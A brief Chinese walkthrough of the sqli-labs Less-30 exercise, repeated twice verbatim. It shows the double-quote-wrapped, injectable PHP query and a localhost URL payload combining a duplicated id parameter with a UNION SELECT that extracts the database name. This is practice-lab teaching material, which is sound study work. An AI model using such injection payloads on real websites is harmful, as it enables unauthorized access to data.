Less-30与less-29原理是一致的,区别仅仅是将id的'变为了",我们可以看到less-30的sql语句为:
$id=$_GET['id']; $id = '"' .$id. '"'; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
所以payload为:
http://127.0.0.1/sql/Less-30/login.php?id=1&id=-1" union select 1,database(),3--+
Less-30与less-29原理是一致的,区别仅仅是将id的'变为了",我们可以看到less-30的sql语句为:
$id=$_GET['id']; $id = '"' .$id. '"'; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
所以payload为:
http://127.0.0.1/sql/Less-30/login.php?id=1&id=-1" union select 1,database(),3--+